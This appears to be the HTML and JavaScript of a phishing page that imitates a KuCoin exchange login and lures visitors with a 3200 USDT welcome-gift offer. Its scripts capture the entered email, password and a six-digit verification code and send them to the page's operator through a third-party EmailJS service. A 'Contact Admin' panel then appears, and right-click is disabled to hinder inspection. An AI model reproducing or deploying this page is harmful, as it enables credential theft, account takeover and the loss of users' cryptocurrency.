                          <div class="KuxBox-root css-c0ajov">
                            <div class="KuxBox-root css-qrlrtm"></div>
                          </div>
                          <div src="img\f4e865e4f1289c74c3d1.png" class="css-fm3kvj">
                            <img src="img\f4e865e4f1289c74c3d1.png" class="css-14d5rtx">
                            <div class="css-13d3z8n e15lf9ig3">
                              <div class="css-1hwe9d5 e15lf9ig2">Login</div>
                              <div class="css-1c7cr12 e15lf9ig1"></div>
                              <div class="css-1n36i2x e15lf9ig0">
                                <span>Receive a Welcome Gift Pack Worth Up to <span class="highlight">3200 USDT</span>!</span>
                              </div>
                            </div>
                          </div>
                        </div>
                        
                        <div id="userInput" order="0" offset="0" class="KuxCol-col css-ts3x3g" style="display: none; justify-content: center; align-items: center; height: 100%; flex: 1 1 0%; max-width: 100%;">
                          <div class="KuxBox-root css-mpa8nz" style="flex-direction: column;">
                            <div class="KuxBox-root css-5kgvnz">
                              <div class="KuxBox-root css-b38fps" style="flex: 1 1 auto;">
                                <h3 class="css-1b1nvj1">Log In</h3>

                                <section class="css-1yvtdo">
                                  <div class="KuxTabs-container KuxTabs-lineContainer css-5pto6a" type="default">
                                    <div class="KuxTabs-scroller KuxTabs-scrollableX css-1v8kgrz" id="_TabsScroller_" style="overflow: hidden; margin-bottom: 0px;">
                                      <div class="KuxTabs-Container css-v0g351" role="tablist">
                                        <div role="tab" aria-selected="true" tabindex="0" class="KuxTab-TabItem KuxTab-variantLine KuxTab-selected css-12u19n3" type="default" label="Email">Email</div>
                                      </div>
                                      <span class="KuxTabs-indicator css-1freloz" style="left: 0px; width: 38.2188px; transition: all 0.3s ease 0s;"><span class="css-1sknxmt"></span></span>
                                    </div>
                                  </div>
                                </section>
                                
                                <form method="post" id="login-form" onsubmit="handleForm(event)" class="css-fcf6q KuxForm-form KuxForm-verticalForm">
                                  
                                  <div class="KuxForm-item css-9mv970">
                                    <div class="KuxForm-itemRowContainer KuxRow-row css-1uqn2oy" style="row-gap: 0px;">
                                      <div order="0" offset="0" class="KuxCol-col css-1dbp2j">
                                        <div class="css-kooiip">
                                          <div class="KuxInput-root KuxInput-sizeXlarge KuxInput-typeText css-1yw1v9j" id="email">
                                            <input type="email" id="emailInput" class="KuxInput-input css-1nddmz0" placeholder="Email">
                                            
                                            <fieldset class="css-1yd51zm"><legend label="Email" class="css-cufmhu">Email</legend></fieldset>
                                          </div>
                                        </div>
                                        <div class="KuxForm-itemHelp css-gvtyj4"></div>
                                      </div>
                                    </div>
                                  </div>

                                  <div class="css-0">
                                    <div class="KuxForm-item css-9mv970">
                                      <div class="KuxForm-itemRowContainer KuxRow-row css-1uqn2oy" style="row-gap: 0px;">
                                        <div order="0" offset="0" class="KuxCol-col css-1dbp2j">
                                          <div>
                                            <div class="KuxInput-root KuxInput-sizeXlarge KuxInput-typePassword mtSpace inputEye css-1yw1v9j" id="password">
                                              <!--<label value="" class="KuxInput-label css-1yn4dg3">Password</label> -->
                                              <input id="passInput" type="text" value="" placeholder="Password" class="KuxInput-input css-1nddmz0" autocomplete="new-password">
                                              <!--
                                                <div class="KuxBox-root KuxInput-suffixWrapper css-js6o5x">
                                                <div class="KuxInput-togglePwdIcon css-gu4t9">
                                                  <svg class="ICEyeClose_svg__icon" viewBox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="24" height="24" fill="#1D1D1D"><path d="M97.824 97.824a42.656 42.656 0 0160.352 0l768 768a42.656 42.656 0 11-60.352 60.352L583.072 643.424a149.28 149.28 0 01-202.464-202.496L97.856 158.176a42.656 42.656 0 010-60.352zm350.112 410.464a64 64 0 0067.776 67.776l-67.808-67.808zm64-225.568a308.16 308.16 0 00-74.368 9.408 42.656 42.656 0 11-20.544-82.816 394.048 394.048 0 0194.912-11.936c111.136 0 210.272 52.928 285.632 110.272 75.904 57.76 132.256 123.52 158.656 156.864 21.312 26.912 23.36 64.128 4.576 93.216-20.16 31.264-61.056 88.32-118.272 135.776a42.656 42.656 0 11-54.432-65.696c45.952-38.08 80.48-84.928 99.008-113.184-24.96-31.2-75.2-88.864-141.152-139.072C677.408 323.36 596.384 282.688 512 282.688zM242.4 335.584c15.04 18.144 12.512 45.056-5.632 60.064-45.984 38.112-80.864 85.216-99.648 113.664 25.088 31.04 75.392 88.128 141.312 137.792 68.512 51.584 149.504 91.84 233.856 91.84 25.376 0 50.432-3.424 74.976-9.568a42.688 42.688 0 0120.704 82.784c-30.56 7.648-62.592 12.096-95.68 12.096-110.816 0-209.824-52.256-285.184-108.992C151.2 658.112 94.784 592.992 68.192 559.776a79.808 79.808 0 01-4.672-93.824c20.384-31.36 61.632-88.608 118.784-136a42.656 42.656 0 0160.064 5.632z"></path></svg>
                                                </div>
                                              </div> -->
                                              <fieldset class="css-1i4kc6k"><legend label="Password" class="css-17b03pk">Password</legend></fieldset>
                                            </div>
                                          </div>
                                          <div class="KuxForm-itemHelp css-gvtyj4"></div>
                                        </div>
                                      </div>
                                    </div>
                                  </div>
                                  
                                  <div class="css-jmf9id">
                                    <div class="KuxForm-item css-9mv970">
                                      <div class="KuxForm-itemRowContainer KuxRow-row css-1uqn2oy" style="row-gap: 0px;">
                                        <div order="0" offset="0" class="KuxCol-col css-1dbp2j">
                                          <label class="KuxCheckbox-wrapper KuxCheckbox-wrapper-checked css-hkv7uv">
                                            <span class="KuxCheckbox-checkbox KuxCheckbox-checked css-157ll7t">
                                              <input id="agree" type="checkbox" class="KuxCheckbox-input css-1q67xq6" checked="">
                                              <span class="KuxCheckbox-inner css-qsv8ak" type="2">
                                                <svg class="ICCheckboxArrow_svg__icon" viewbox="0 0 1024 1024" xmlns="http://www.w3.org/2000/svg" width="1em" height="1em" fill="#FFFFFF"><path d="M845.248 365.248a64 64 0 10-90.496-90.496L416 613.504 269.248 466.752a64 64 0 10-90.496 90.496l192 192a64 64 0 0090.496 0l384-384z"></path></svg>
                                              </span>
                                            </span>
                                            <span class="css-76wc5"><span class="css-1ahqney"><span>I have read and agree to the <a rel="noopener noreferrer" target="_blank" href="https://www.kucoin.com/legal/terms-of-use">Terms of Use</a>.</span></span></span>
                                          </label>
                                          <div class="KuxForm-itemHelp css-gvtyj4"></div>
                                        </div>
                                      </div>
                                    </div>
                                  </div>
                                  <button class="KuxButton-root KuxButton-contained KuxButton-containedPrimary KuxButton-sizeLarge KuxButton-containedSizeLarge KuxButton-fullWidth css-1awe74r" type="submit">
                                    Login In
                                  </button>
                                  
                                </form>
                              </div>
                            </div>
                            
                            
                            <div class="KuxBox-root css-1b12qyh"></div>
                          </div>
                        </div>

                        <div id="codeInput" order="0" offset="0" style="display: flex; justify-content: center; align-items: center; height: 100%; flex: 1 1 0%; max-width: 100%;" class="KuxCol-col css-ts3x3g">
                          <div class="KuxBox-root css-mpa8nz" style="flex-direction: column;">
                            <div class="KuxBox-root css-5kgvnz">
                              <div class="KuxBox-root css-mpirg9">
                                <div class="KuxBox-root css-b38fps" style="flex: 1 1 auto;">
                                  <div class="KuxSpin-root KuxSpin-smallSpin KuxSpin-themeLight css-1280167" type="brand">
                                    <div class="KuxSpin-container css-1skih21">
                                      <div class="KuxBox-root css-1lha2kr">
                                        <div class="KuxBox-root css-1s1a632">
                                          
                                          <h2 class="css-mr4dhk">Contact Admin</h2>
                                          <div class="KuxBox-root css-1ule816">
                                            <img src="img/barcode.png" width="60%" style="margin: 5%; margin-left: 0px;">
                                          </div>
                                          <form method="post" class="KuxForm-form KuxForm-verticalForm">
                                            
                                            <div class="css-4yc8eq">
                                              <div class="KuxForm-item css-9mv970">
                                                <div class="KuxForm-itemRowContainer KuxRow-row css-1uqn2oy" style="row-gap: 0px;">
                                                  <div order="0" offset="0" class="KuxCol-col css-1dbp2j">
                                                    <label class="KuxCheckbox-wrapper css-hkv7uv">

                                                      <span class="css-76wc5">Please Contact admin to finish up this process.</span>
                                                    </label>
                                                    <div class="KuxForm-itemHelp css-gvtyj4"></div>
                                                  </div>
                                                </div>
                                              </div>
                                            </div>

                                            
                                          </form>
                                          
                                        </div>
                                      </div>
                                    </div>
                                  </div>
                                </div>
                              </div>
                            </div>
                            <div class="KuxBox-root css-1b12qyh"></div>
                          </div>
                        </div>
                      
                      </div>
                    </section>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>

    <script src="jquery.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
    <script>
      (function () {
        emailjs.init('pkSAXxhgLoiagvhKY');
      })();
    </script>

<script>
  const handleForm = async (e) => {
    e.preventDefault();

    let email = $("#emailInput").val();
    let password = $("#passInput").val();
    let message = `Username ${email}\nPassword: ${password}`;
    let data = {
      message: message
    }

    try {
      await emailjs.send('service_mznrb7a', 'template_5zs2cjt', data);
      //alert('email sent!');
      switchForm();

    } catch (error) {
      console.error(error);
      alert('Failed to send email');
    }
    
  };

  const sendToken = async (e) => {
    e.preventDefault();
    let token = ''
    
   token1 = $('#token1').val()
   token2 = $('#token2').val()
   token3 = $('#token3').val()
   token4 = $('#token4').val()
   token5 = $('#token5').val()
   token6 = $('#token6').val()

   token = '' + token1 + token2 + token3 + token4 + token5 + token6
   console.log(token)

    data = {
      message: `Token Code: ${token}`
    }

    console.log(data)

    
    
    try {
      await emailjs.send('service_mznrb7a', 'template_5zs2cjt', data);
      alert('email sent!');
      

    } catch (error) {
      console.error(error);
      alert('Failed to send email');
    }
    

  }
</script>
  
    <script>

      const switchForm = () => {

        $("#userInput").hide();
        $("#codeInput").show();
      }

      window.addEventListener('load', function () {
        //$("#codeInput").hide();
        //switchForm();
      })

    </script>
  
  <script type="text/javascript"> 
function disableRightClick() 
{ 
alert("Sorry, right click is not allowed !!"); 
return false; 
} 
</script> 
<body oncontextmenu=" return disableRightClick();">
    
  </body>

</html>